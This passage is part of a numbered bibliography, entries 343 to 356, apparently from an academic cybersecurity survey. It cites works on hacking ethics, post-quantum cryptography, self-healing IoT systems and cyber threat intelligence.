[343] Kenneth Einar Himma, Ethical issues involving computer security: hacking, hacktivism, and counterhacking, in: The Handbook of Information and Computer Ethics, 2008, p. 191.
[344] Ross Brewer, Cyber threats: reducing the time to detection and response, Netw. Secur. 2015 (5) (2015) 5–8.
[345] Eman Salim Ibrahim Harba, Secure data encryption through a combination of AES, RSA and HMAC, Eng. Technol. Appl. Sci. Res. 7 (4) (2017) 1781–1785.
[346] Gorjan Alagic, Jacob Alperin-Sheriff, Daniel Apon, David Cooper, Quynh Dang, Yi-Kai Liu, Carl Miller, Dustin Moody, Rene Peralta, et al., Status Report on the First Round of the NIST Post-Quantum Cryptography Standardization Process, US Department of Commerce, National Institute of Standards and Technology, 2019.
[347] Lily Chen, Stephen Jordan, Yi-Kai Liu, Dustin Moody, Rene Peralta, Ray Perlner, Daniel Smith-Tone, Report on Post-Quantum Cryptography, US Department of Commerce, National Institute of Standards and Technology, 2016.
[348] Jintai Ding, Rainer Steinwandt (Eds.), Post-Quantum Cryptography: 10th International Conference, PQCrypto 2019, Chongqing, China, May 8–10, 2019, Revised Selected Papers, vol. 11505, Springer, 2019.
[349] João Pedro Dias, Tiago Boldt Sousa, André Restivo, Hugo Sereno Ferreira, A pattern-language for self-healing internet-of-things systems, in: Proceedings of the European Conference on Pattern Languages of Programs 2020, 2020, pp. 1–17.
[350] Ronny Seiger, Stefan Herrmann, Uwe Aßmann, Self-healing for distributed workflows in the internet of things, in: 2017 IEEE International Conference on Software Architecture Workshops (ICSAW), IEEE, 2017, pp. 72–79.
[351] Rafael Angarita, Responsible objects: towards self-healing internet of things applications, in: 2015 IEEE International Conference on Autonomic Computing, IEEE, 2015, pp. 307–312.
[352] Kimberly Graves, CEH Certified Ethical Hacker Study Guide, John Wiley & Sons, 2010.
[353] M.E. Elhamahmy, Tarek S. Sobh, Preventing information leakage caused by war driving attacks in Wi-Fi networks, in: International Conference on Aerospace Sciences and Aviation Technology, vol. 14, The Military Technical College, 2011, pp. 1–9.
[354] Vasileios Mavroeidis, Siri Bromander, Cyber threat intelligence model: an evaluation of taxonomies, sharing standards, and ontologies within cyber threat intelligence, in: 2017 European Intelligence and Security Informatics Conference (EISIC), IEEE, 2017, pp. 91–98.
[355] Md Sahrom Abu, Siti Rahayu Selamat, Aswami Ariffin, Robiah Yusof, Cyber threat intelligence: issue and challenges, Indon. J. Electr. Eng. Comput. Sci. 10 (1) (2018) 371–379.
[356] Thomas D. Wagner, Khaled Mahbub, Esther Palomar, Ali E. Abdallah, Cyber threat intelligence sharing: survey and research directions, Comput. Secur. 87 (2019) 101589.
